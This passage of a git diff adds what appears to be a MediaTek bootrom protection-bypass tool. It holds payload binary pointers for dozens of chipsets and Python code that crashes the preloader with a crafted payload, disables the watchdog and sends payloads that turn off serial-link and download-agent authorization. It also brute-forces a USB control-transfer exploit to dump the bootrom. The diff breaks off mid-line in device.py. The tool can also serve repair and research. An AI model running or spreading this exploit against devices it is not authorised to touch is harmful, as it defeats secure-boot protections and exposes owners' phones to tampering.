0000000000000000000000000000000000000000..f2d5841cef95f48f8f293fbb06c907c6167ce77b --- /dev/null +++ b/exploits_collection/payloads/generic_dump_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5fdceec17aad68669b214dd65caa45a2b889b897936b77803e2f466a348af349 +size 296 diff --git a/exploits_collection/payloads/generic_loader_payload.bin b/exploits_collection/payloads/generic_loader_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..7140d64a05812a92311696f9450eaf35a0439a77 --- /dev/null +++ b/exploits_collection/payloads/generic_loader_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e887a930a9477ab9a1e56b05b31bb5a58bed30664045338d97f7fe6dc71d3f54 +size 64 diff --git a/exploits_collection/payloads/generic_reboot_payload.bin b/exploits_collection/payloads/generic_reboot_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..21b91a608856aedbeb8e4dd1126935fcf774657e --- /dev/null +++ b/exploits_collection/payloads/generic_reboot_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f9c276cb23bc626753286de8b1ff96df5e4b25be3f59bbcf3a8032ac439fe108 +size 48 diff --git a/exploits_collection/payloads/generic_uart_dump_payload.bin b/exploits_collection/payloads/generic_uart_dump_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..764b0dc6b8db48b28d0ac4dfc8f2a914f44bd512 --- /dev/null +++ b/exploits_collection/payloads/generic_uart_dump_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bcc29db220226c4b900ddbf94023c6f3c3342ce705c26e3493502251238e4b32 +size 312 diff --git a/exploits_collection/payloads/mt6261_payload.bin b/exploits_collection/payloads/mt6261_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..2927b229077913a109e6411e820e82fd272d0551 --- /dev/null +++ b/exploits_collection/payloads/mt6261_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6c55ce771f424d46fbb9af5ebab73dc35ce272365ca9eb443370b27bc3e31ff7 +size 596 diff --git a/exploits_collection/payloads/mt6572_payload.bin b/exploits_collection/payloads/mt6572_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..a03d7ad9f53312e59e3c3c8958bb7ae92ab3bb4b --- /dev/null +++ b/exploits_collection/payloads/mt6572_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:512dd5d09e4a34836b24e6caaa130d5209136a1759b1ef1be3dec9721bf04ccc +size 600 diff --git a/exploits_collection/payloads/mt6580_payload.bin b/exploits_collection/payloads/mt6580_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..7ee7cf205aa65c3ab94cf88f8f5d70b9e494b660 --- /dev/null +++ b/exploits_collection/payloads/mt6580_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8ded7dfcad11bf60ee0e57b38d56e0ff7ccc8a6780c45fd9d8239ec8df53ba79 +size 600 diff --git a/exploits_collection/payloads/mt6582_payload.bin b/exploits_collection/payloads/mt6582_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..29ae4142b4b799ffc2163394de0f1ff370d57150 --- /dev/null +++ b/exploits_collection/payloads/mt6582_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d65304bbcd3ee0b1c60dfaa706a183d5b3b29e8db62418d660855752289594d2 +size 600 diff --git a/exploits_collection/payloads/mt6592_payload.bin b/exploits_collection/payloads/mt6592_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..4556e3a036d7497e5ebed1cccea36235e7845da5 --- /dev/null +++ b/exploits_collection/payloads/mt6592_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1d44e6cc8eb8d17c95a5b19ab5c951728ed39a6ea5b3e50b1df720df8649a9b4 +size 600 diff --git a/exploits_collection/payloads/mt6595_payload.bin b/exploits_collection/payloads/mt6595_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..04bf2bbb7d5603009f0d999bf5dae8df5a3ae020 --- /dev/null +++ b/exploits_collection/payloads/mt6595_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7a7363ed2b75a6796c94c6ade0c39a2838c00b7d5cf1e14a6ddcf607eb73634 +size 600 diff --git a/exploits_collection/payloads/mt6735_payload.bin b/exploits_collection/payloads/mt6735_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..854a9916254bfc64a9b040a66bf2ac9c2968a09f --- /dev/null +++ b/exploits_collection/payloads/mt6735_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5a845468619f58aa108236cd2e048374a374a0bf833b05969ffbdf2ca0bb662b +size 600 diff --git a/exploits_collection/payloads/mt6737_payload.bin b/exploits_collection/payloads/mt6737_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..3883a16585378f36cba7ae3ea20a1a0dece5d3e6 --- /dev/null +++ b/exploits_collection/payloads/mt6737_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b6efe0b5af21699007cd9eb47b88bdd800fd19d6ff70d65dceedd61ee7137e5 +size 600 diff --git a/exploits_collection/payloads/mt6739_payload.bin b/exploits_collection/payloads/mt6739_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..06eecfe9be3eed984df0d785adb9b76b94422eb2 --- /dev/null +++ b/exploits_collection/payloads/mt6739_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d372011cd5c72d94c635a1197c30b24716a8a4611f478888d4264004308ef9d2 +size 612 diff --git a/exploits_collection/payloads/mt6750_payload.bin b/exploits_collection/payloads/mt6750_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..43e3ad13a4e51595cbf99879deb349954cd5dd36 --- /dev/null +++ b/exploits_collection/payloads/mt6750_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4f952d41829f28b9ad88c0389c719a10c0942eb02ef32d3fe72f3c7fb7bd5f4e +size 684 diff --git a/exploits_collection/payloads/mt6753_payload.bin b/exploits_collection/payloads/mt6753_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..b1284992a7a46d282e4de299a924ad5271fe8ab5 --- /dev/null +++ b/exploits_collection/payloads/mt6753_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ca48914ab40ce2fde63841b7651855c98477a5a93a79e6afc18c4b81d572b206 +size 600 diff --git a/exploits_collection/payloads/mt6755_payload.bin b/exploits_collection/payloads/mt6755_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..9897185b10894e229aadc5e0033c7dce17d44df0 --- /dev/null +++ b/exploits_collection/payloads/mt6755_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fa86a785a0bcf8468285c8922f931a94a2b23dcc93098b3281e5d52f28387262 +size 600 diff --git a/exploits_collection/payloads/mt6757_payload.bin b/exploits_collection/payloads/mt6757_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..79f249e357c66d4681e643a6871e253d16d883b6 --- /dev/null +++ b/exploits_collection/payloads/mt6757_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c27f4b5d4b33c7bfd42d84927371041deb45f195797ebf371d7f713c93f90f57 +size 600 diff --git a/exploits_collection/payloads/mt6761_payload.bin b/exploits_collection/payloads/mt6761_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..a34d220c50a3ac3abaa8f76410b31c63d42a4775 --- /dev/null +++ b/exploits_collection/payloads/mt6761_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f0d4f402ecdd17244d96db79e81bbbb4569a093ef0d97709d3cad7d7a5e85ab0 +size 612 diff --git a/exploits_collection/payloads/mt6763_payload.bin b/exploits_collection/payloads/mt6763_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..6fc4c164eda2f68777288b3b150e340380a56859 --- /dev/null +++ b/exploits_collection/payloads/mt6763_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c193fa0c493f90471b23c3a89b339b4523df9cb15e6d9b1e24a749121522cffb +size 612 diff --git a/exploits_collection/payloads/mt6765_payload.bin b/exploits_collection/payloads/mt6765_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..36e398cfaeae2b479be3453b7c754a2bcfb0cd6e --- /dev/null +++ b/exploits_collection/payloads/mt6765_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:da9d34f8d56cc943683620eb79fc48b73872c6cb7e85454c50585fa68b496f46 +size 612 diff --git a/exploits_collection/payloads/mt6768_payload.bin b/exploits_collection/payloads/mt6768_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..3dbaeb3a5b002a9c24b774dffbc047b7d21f4a21 --- /dev/null +++ b/exploits_collection/payloads/mt6768_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8d812ae251c0b6294b8fc180169bd070e5d42b8e54a371cf14e635e4c3cc8302 +size 612 diff --git a/exploits_collection/payloads/mt6771_payload.bin b/exploits_collection/payloads/mt6771_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..1fef8792a04cf5fc0a43362ba830f54f52af34ef --- /dev/null +++ b/exploits_collection/payloads/mt6771_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7488880d5df691aa5fab26128a5632b8921350c31baeb43421735d8e03756bc7 +size 612 diff --git a/exploits_collection/payloads/mt6779_payload.bin b/exploits_collection/payloads/mt6779_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..c960aa32439e66a2679104caf1a761f8f2059d71 --- /dev/null +++ b/exploits_collection/payloads/mt6779_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:02d95a77511902028a07df411ff51b869fad477b608d612368378f77607fff76 +size 612 diff --git a/exploits_collection/payloads/mt6785_payload.bin b/exploits_collection/payloads/mt6785_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..3977698c8d1605ef3a12830a4d844ea50fcd096c --- /dev/null +++ b/exploits_collection/payloads/mt6785_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f0d47794bb84406ffd0c74a104f8d3237c5393859316b5712d8ce7c20fae4f3c +size 612 diff --git a/exploits_collection/payloads/mt6795_payload.bin b/exploits_collection/payloads/mt6795_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..dc476e01ce091b3b688d3a3810737a8e348990df --- /dev/null +++ b/exploits_collection/payloads/mt6795_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:956b3b4c2643b38c39f1f1241cadd308def77c28c13940ecfe427e40130f59f2 +size 600 diff --git a/exploits_collection/payloads/mt6797_payload.bin b/exploits_collection/payloads/mt6797_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..bea91d1222a4a7f7c6d9425c756a7223b0b7c924 --- /dev/null +++ b/exploits_collection/payloads/mt6797_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e15b2acc3d2fae7b9dab5676cccbb610f1533eeffbf45ddba37777f7a8c6fe8b +size 600 diff --git a/exploits_collection/payloads/mt6799_payload.bin b/exploits_collection/payloads/mt6799_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..dcac52356cc207572fdcff4362f4ee22a25420ee --- /dev/null +++ b/exploits_collection/payloads/mt6799_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a4604277287a3032f12651a1294c65c30367adece683220462ee4a2ad8148207 +size 612 diff --git a/exploits_collection/payloads/mt6833_payload.bin b/exploits_collection/payloads/mt6833_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..75cc80280335ab137ffb4f5ccddc81c2706eacf7 --- /dev/null +++ b/exploits_collection/payloads/mt6833_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:878f45230dc7433b45df93b141c34d2cf36f5fe6ac2f9c4e31be0c54d169b5de +size 612 diff --git a/exploits_collection/payloads/mt6853_payload.bin b/exploits_collection/payloads/mt6853_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..97718f93561817ba2dddc0b91f2be2bf6b222cf2 --- /dev/null +++ b/exploits_collection/payloads/mt6853_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0b98563fe19acc5f33af489603bce6678831a7d8674d73ecf2931abffea24a5d +size 612 diff --git a/exploits_collection/payloads/mt6873_payload.bin b/exploits_collection/payloads/mt6873_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..fba48072ec8e09af766e4f78d3658e06d1693214 --- /dev/null +++ b/exploits_collection/payloads/mt6873_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:657f7789d5997f439ef1ec7595675d48c08b8d08e0581b3776e166a85f8fa819 +size 612 diff --git a/exploits_collection/payloads/mt6885_payload.bin b/exploits_collection/payloads/mt6885_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..75ffdeaa81ae1c873b52a32f1b24069c414a25ea --- /dev/null +++ b/exploits_collection/payloads/mt6885_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a363f1175ec09660ba94b6b5bdbe506e044c4696eae43c3dfe2b1bef13c7440 +size 612 diff --git a/exploits_collection/payloads/mt8127_payload.bin b/exploits_collection/payloads/mt8127_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..3a065e2c25c275b784bf06239b3fab10f9e6a302 --- /dev/null +++ b/exploits_collection/payloads/mt8127_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:372a67d80b5cca43858deed4f44e82f4c7a69faa0a28f8c1fa90fc8fe88de59f +size 600 diff --git a/exploits_collection/payloads/mt8163_payload.bin b/exploits_collection/payloads/mt8163_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..1da1870e139b5df6258fdca47417efab88f94b2d --- /dev/null +++ b/exploits_collection/payloads/mt8163_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:450676f55daf21f1f6e1c733fa6d8c31b0d2b88598f203fc1e1a5282ffc4995e +size 600 diff --git a/exploits_collection/payloads/mt8167_payload.bin b/exploits_collection/payloads/mt8167_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..da318a035ac3617e02a0a12c8b20d7bdc2912c56 --- /dev/null +++ b/exploits_collection/payloads/mt8167_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ad6bf2b8f10554671715cc1fd27dcae86f6608d6af86b0686c7c5b9669b19a51 +size 612 diff --git a/exploits_collection/payloads/mt8173_payload.bin b/exploits_collection/payloads/mt8173_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..2b80620745cdbdb0155670bd1969aba0dee406fe --- /dev/null +++ b/exploits_collection/payloads/mt8173_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bc65b5184d97098cafcc431454e0549bbdb8e7d5b4f6148800c46343c218faf6 +size 600 diff --git a/exploits_collection/payloads/mt8590_payload.bin b/exploits_collection/payloads/mt8590_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..599e8e7db990f827b08dec86377e90a3e0688e9d --- /dev/null +++ b/exploits_collection/payloads/mt8590_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2d5fcc0f926684beb5c9558beecf29ac0f9b1244fdc701fee7ad0a6af3de39c8 +size 600 diff --git a/exploits_collection/payloads/mt8695_payload.bin b/exploits_collection/payloads/mt8695_payload.bin new file mode 100644 index 0000000000000000000000000000000000000000..b0ce86ebf30dd34aee3eecce4e3aad23747210fe --- /dev/null +++ b/exploits_collection/payloads/mt8695_payload.bin @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:01653e6daf12d14014a2d3cae9fc2cab8afb34727228197fba09fce70eca035a +size 592 diff --git a/libusb-1.0.dll b/libusb-1.0.dll new file mode 100644 index 0000000000000000000000000000000000000000..77fc2f51f61627e7fe2d0f4104caae8ffded6f38 --- /dev/null +++ b/libusb-1.0.dll @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6b24b0ee1a59cbae385dd15b06eddf2c72b2ff3a875ae279883a880136c59ec8 +size 166912 diff --git a/main.py b/main.py new file mode 100644 index 0000000000000000000000000000000000000000..7336b34c766ecb826785b71d1933c72bdd2c7c87 --- /dev/null +++ b/main.py @@ -0,0 +1,237 @@ +#!/bin/python3 + +from src.exploit import exploit +from src.common import from_bytes, to_bytes +from src.config import Config +from src.device import Device +from src.logger import log +from src.bruteforce import bruteforce + +import argparse +import os + +DEFAULT_CONFIG = "exploits_collection/default_config.json5" +PAYLOAD_DIR = "exploits_collection/payloads/" +DEFAULT_PAYLOAD = "generic_dump_payload.bin" +DEFAULT_DA_ADDRESS = 0x200D00 + + +def main(): + parser = argparse.ArgumentParser() + parser.add_argument("-c", "--config", help="Device config") + parser.add_argument("-t", "--test", help="Testmode", const="0x9900", nargs='?') + parser.add_argument("-w", "--watchdog", help="Watchdog address(in hex)") + parser.add_argument("-u", "--uart", help="UART base address(in hex)") + parser.add_argument("-v", "--var_1", help="var_1 value(in hex)") + parser.add_argument("-a", "--payload_address", help="payload_address value(in hex)") + parser.add_argument("-p", "--payload", help="Payload to use") + parser.add_argument("-f", "--force", help="Force exploit on insecure device", action="store_true") + parser.add_argument("-n", "--no_handshake", help="Skip handshake", action="store_true") + parser.add_argument("-m", "--crash_method", help="Method to use for crashing preloader (0, 1, 2)", type=int) + parser.add_argument("-k", "--kamakiri", help="Force use of kamakiri", action="store_true") + arguments = parser.parse_args() + + if arguments.config: + if not os.path.exists(arguments.config): + raise RuntimeError("Config file {} doesn't exist".format(arguments.config)) + elif not os.path.exists(DEFAULT_CONFIG): + raise RuntimeError("Default config is missing") + + device = Device().find() + + config, serial_link_authorization, download_agent_authorization, hw_code = get_device_info(device, arguments) + + while device.preloader: + device = crash_preloader(device, config) + config, serial_link_authorization, download_agent_authorization, hw_code = get_device_info(device, arguments) + + log("Disabling watchdog timer") + device.write32(config.watchdog_address, 0x22000064) + + if device.libusb0: + arguments.kamakiri = True + + bootrom__name = "bootrom_" + hex(hw_code)[2:] + ".bin" + + if arguments.test and not arguments.kamakiri: + dump_ptr = int(arguments.test, 16) + found = False + while not found: + log("Test mode, testing " + hex(dump_ptr) + "...") + found, dump_ptr = bruteforce(device, config, dump_ptr) + device.dev.close() + reconnect_message() + device = Device().find(wait=True) + device.handshake() + while device.preloader: + device = crash_preloader(device, config) + device.handshake() + log("Found " + hex(dump_ptr) + ", dumping bootrom to {}".format(bootrom__name)) + open(bootrom__name, "wb").write(bruteforce(device, config, dump_ptr, True)) + exit(0) + + if serial_link_authorization or download_agent_authorization or arguments.force: + log("Disabling protection") + + payload = prepare_payload(config) + + result = exploit(device, config, payload, arguments) + if arguments.test: + while not result: + device.dev.close() + config.var_1 += 1 + log("Test mode, testing " + hex(config.var_1) + "...") + reconnect_message() + device = Device().find(wait=True) + device.handshake() + while device.preloader: + device = crash_preloader(device, config) + device.handshake() + result = exploit(device, config, payload, arguments) + else: + log("Insecure device, sending payload using send_da") + + if not arguments.payload: + config.payload = DEFAULT_PAYLOAD + if not arguments.payload_address: + config.payload_address = DEFAULT_DA_ADDRESS + + payload = prepare_payload(config) + + payload += b'\x00' * 0x100 + + device.send_da(config.payload_address, len(payload), 0x100, payload) + device.jump_da(config.payload_address) + + result = device.read(4) + + if result == to_bytes(0xA1A2A3A4, 4): + log("Protection disabled") + elif result == to_bytes(0xC1C2C3C4, 4): + dump_brom(device, bootrom__name) + elif result == to_bytes(0x0000C1C2, 4) and device.read(4) == to_bytes(0xC1C2C3C4, 4): + dump_brom(device, bootrom__name, True) + elif result != b'': + raise RuntimeError("Unexpected result {}".format(result.hex())) + else: + log("Payload did not reply") + + device.close() + +def reconnect_message(): + print("") + print("Please reconnect device in bootrom mode") + print("") + +def dump_brom(device, bootrom__name, word_mode=False): + log("Found send_dword, dumping bootrom to {}".format(bootrom__name)) + + with open(bootrom__name, "wb") as bootrom: + if word_mode: + for i in range(0x20000 // 4): + device.read(4) # discard garbage + bootrom.write(device.read(4)) + else: + bootrom.write(device.read(0x20000)) + + +def prepare_payload(config): + with open(PAYLOAD_DIR + config.payload, "rb") as payload: + payload = payload.read() + + # replace watchdog_address and uart_base in generic payload + payload = bytearray(payload) + if from_bytes(payload[-4:], 4, '<') == 0x10007000: + payload[-4:] = to_bytes(config.watchdog_address, 4, '<') + if from_bytes(payload[-8:][:4], 4, '<') == 0x11002000: + payload[-8:] = to_bytes(config.uart_base, 4, '<') + payload[-4:] + payload = bytes(payload) + + while len(payload) % 4 != 0: + payload += to_bytes(0) + + return payload + + +def get_device_info(device, arguments): + if not arguments.no_handshake: + device.handshake() + + hw_code = device.get_hw_code() + hw_sub_code, hw_ver, sw_ver = device.get_hw_dict() + secure_boot, serial_link_authorization, download_agent_authorization = device.get_target_config() + + if arguments.config: + config_file = open(arguments.config) + config = Config().from_file(config_file, hw_code) + config_file.close() + else: + try: + config = Config().default(hw_code) + except NotImplementedError as e: + if arguments.test: + config = Config() + + log(e) + else: + raise e + + if arguments.test: + config.payload = DEFAULT_PAYLOAD + if arguments.var_1: + config.var_1 = int(arguments.var_1, 16) + if arguments.watchdog: + config.watchdog_address = int(arguments.watchdog, 16) + if arguments.uart: + config.uart_base = int(arguments.uart, 16) + if arguments.payload_address: + config.payload_address = int(arguments.payload_address, 16) + if arguments.payload: + config.payload = arguments.payload + if arguments.crash_method: + config.crash_method = arguments.crash_method + + + if not os.path.exists(PAYLOAD_DIR + config.payload): + raise RuntimeError("Payload file {} doesn't exist".format(PAYLOAD_DIR + config.payload)) + + print() + log("Device hw code: {}".format(hex(hw_code))) + log("Device hw sub code: {}".format(hex(hw_sub_code))) + log("Device hw version: {}".format(hex(hw_ver))) + log("Device sw version: {}".format(hex(sw_ver))) + log("Device secure boot: {}".format(secure_boot)) + log("Device serial link authorization: {}".format(serial_link_authorization)) + log("Device download agent authorization: {}".format(download_agent_authorization)) + print() + + return config, serial_link_authorization, download_agent_authorization, hw_code + +def crash_preloader(device, config): + print("") + log("Found device in preloader mode, trying to crash...") + print("") + if config.crash_method == 0: + try: + payload = b'\x00\x01\x9F\xE5\x10\xFF\x2F\xE1' + b'\x00' * 0x110 + device.send_da(0, len(payload), 0, payload) + device.jump_da(0) + except RuntimeError as e: + log(e) + print("") + elif config.crash_method == 1: + payload = b'\x00' * 0x100 + device.send_da(0, len(payload), 0x100, payload) + device.jump_da(0) + elif config.crash_method == 2: + device.read32(0) + + device.dev.close() + + device = Device().find() + + return device + + +if __name__ == "__main__": + main() diff --git a/mtk-bypass-utility.zip b/mtk-bypass-utility.zip new file mode 100644 index 0000000000000000000000000000000000000000..b64ab6bb0de429b3570f73a770dc74b3e37eb715 --- /dev/null +++ b/mtk-bypass-utility.zip @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d9f0a86c19b91f38cd8e64522fc8b550b3a750120902838a247a50350bd60d8b +size 6426596 diff --git a/mtk_bypass.bat b/mtk_bypass.bat new file mode 100644 index 0000000000000000000000000000000000000000..875f4745ee6de0c19b3b2e167020d752d144fa38 --- /dev/null +++ b/mtk_bypass.bat @@ -0,0 +1 @@ +start cmd /k "python main.py" \ No newline at end of file diff --git a/src/bruteforce.py b/src/bruteforce.py new file mode 100644 index 0000000000000000000000000000000000000000..57957220c9d95e4218152b0a02dcfc1214b57e03 --- /dev/null +++ b/src/bruteforce.py @@ -0,0 +1,63 @@ +from src.common import to_bytes, from_bytes + +import usb +import array +import struct + +def bruteforce(device, config, dump_ptr, dump=False): + + addr = config.watchdog_address + 0x50 + + # We don't need to wait long, if we succeeded + # noinspection PyBroadException + try: + device.dev.timeout = 1 + except Exception: + pass + + udev = device.udev + + try: + # noinspection PyProtectedMember + udev._ctx.managed_claim_interface = lambda *args, **kwargs: None + except AttributeError as e: + raise RuntimeError("libusb is not installed for port {}".format(device.dev.port)) from e + + linecode = udev.ctrl_transfer(0xA1, 0x21, 0, 0, 7) + array.array('B', [0]) + + if dump: + try: + device.cmd_da(0, 0, 1) + device.read32(addr) + except: + pass + + for i in range(4): + udev.ctrl_transfer(0x21, 0x20, 0, 0, linecode + array.array('B', to_bytes(dump_ptr - 6 + (4 - i), 4, '<'))) + udev.ctrl_transfer(0x80, 0x6, 0x0200, 0, 9) + + brom = bytearray(device.cmd_da(0, 0, 0x20000)) + brom[dump_ptr - 1:] = b"\x00" + to_bytes(0x100030, 4, '<') + brom[dump_ptr + 4:] + return brom + + else: + try: + device.cmd_da(0, 0, 1) + device.read32(addr) + except: + pass + + for address in range(dump_ptr, 0xffff, 4): + for i in range(3): + udev.ctrl_transfer(0x21, 0x20, 0, 0, linecode + array.array('B', to_bytes(address - 5 + (3 - i), 4, '<'))) + udev.ctrl_transfer(0x80, 0x6, 0x0200, 0, 9) + try: + if(len(device.cmd_da(0, 0, 0x40))) == 0x40: + return (True, address) + except RuntimeError: + try: + device.read32(addr) + except: + return (False, address + 4) + except Exception: + return (False, address + 4) diff --git a/src/common.py b/src/common.py new file mode 100644 index 0000000000000000000000000000000000000000..479f81cf9ea60ffff23d4f78064806b4cca9784f --- /dev/null +++ b/src/common.py @@ -0,0 +1,21 @@ +import struct + + +def raise_(ex): + raise ex + + +def to_bytes(value, size=1, endian='>'): + return { + 1: lambda: struct.pack(endian + 'B', value), + 2: lambda: struct.pack(endian + 'H', value), + 4: lambda: struct.pack(endian + 'I', value) + }.get(size, lambda: raise_(RuntimeError("invalid size")))() + + +def from_bytes(value, size=1, endian='>'): + return { + 1: lambda: struct.unpack(endian + 'B', value)[0], + 2: lambda: struct.unpack(endian + 'H', value)[0], + 4: lambda: struct.unpack(endian + 'I', value)[0] + }.get(size, lambda: raise_(RuntimeError("invalid size")))() diff --git a/src/config.py b/src/config.py new file mode 100644 index 0000000000000000000000000000000000000000..1a52a7d7ac02e6e58cfd206923969e42bac94ce8 --- /dev/null +++ b/src/config.py @@ -0,0 +1,61 @@ +import json5 + + +class Config: + watchdog_address: int = 0x10007000 + uart_base: int = 0x11002000 + payload_address: int = 0x100A00 + var_0: int = None + var_1: int = 0xA + payload: str + crash_method: int = 0 + ptr_usbdl: int = None + ptr_da: int = None + + def default(self, hw_code): + config = open("default_config.json5") + self.from_file(config, hw_code) + config.close() + + return self + + def from_file(self, config, hw_code): + hw_code = hex(hw_code) + + config = json5.load(config) + + if hw_code in config: + self.from_dict(config[hw_code]) + else: + raise NotImplementedError("Can't find {} hw_code in config".format(hw_code)) + + return self + + def from_dict(self, entry): + if "watchdog_address" in entry: + self.watchdog_address = entry["watchdog_address"] + + if "uart_base" in entry: + self.uart_base = entry["uart_base"] + + if "payload_address" in entry: + self.payload_address = entry["payload_address"] + + if "var_0" in entry: + self.var_0 = entry["var_0"] + + if "var_1" in entry: + self.var_1 = entry["var_1"] + + if "crash_method" in entry: + self.crash_method = entry["crash_method"] + + if "ptr_usbdl" in entry: + self.ptr_usbdl = entry["ptr_usbdl"] + + if "ptr_da" in entry: + self.ptr_da = entry["ptr_da"] + + self.payload = entry["payload"] + + return self diff --git a/src/device.py b/src/device.py new file mode 100644 index 0000000000000000000000000000000000000000..49fd08977313d4463d938f0917f96153d2f7545b --- /dev/null +++ b/src/device.py @@ -0,0 +1,343 @@ +from src.common import to_bytes, from_bytes +from src.logger import log +import usb +import usb.backend.libusb1 +import usb.backend.libusb0 +from ctypes import c_void_p, c_int +import array +import os + +import time + +BAUD = 115200 +TIMEOUT = 1 +VID = "0E8D" +PID = "0003" + + +class Device: + def __init__(self, port=None): + self.udev = None + self.dev = None + self.rxbuffer = array.array('B') + self.preloader = False + self.timeout = TIMEOUT + self.usbdk = False + self.libusb0 = False + + if os.name == 'nt': + try: + file_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), "..") + try: + os.add_dll_directory(file_dir) + except Exception: + pass + os.environ['PATH'] = file_dir + ';' + os.environ['PATH'] + except Exception: + pass + + def find(self, wait=False): + if self.dev: + raise RuntimeError("Device already found") + + try: + self.backend = usb.backend.libusb1.get_backend(find_library=lambda x: "libusb-1.0.dll") + if self.backend: + try: + self.backend.lib.libusb_set_option.argtypes = [c_void_p, c_int] + self.backend.lib.libusb_set_option(self.backend.ctx, 1) # <--- this is the magic call to enable usbdk mode + self.usbdk = True + except ValueError: + log("Failed enabling UsbDk mode, please use 64-Bit Python and 64-Bit UsbDk") + else: + self.backend = usb.backend.libusb1.get_backend() + except usb.core.USBError: + self.backend = usb.backend.libusb1.get_backend() + + log("Waiting for device") + if wait: + self.udev = usb.core.find(idVendor=int(VID, 16), backend=self.backend) + while self.udev: + time.sleep(0.25) + self.udev = usb.core.find(idVendor=int(VID, 16), backend=self.backend) + self.udev = None + while not self.udev: + self.udev = usb.core.find(idVendor=int(VID, 16), backend=self.backend) + if self.udev: + break + time.sleep(0.25) + + log("Found device = {0:04x}:{1:04x}".format(self.udev.idVendor, self.udev.idProduct)) + self.dev = self + + try: + if self.udev.is_kernel_driver_active(0): + 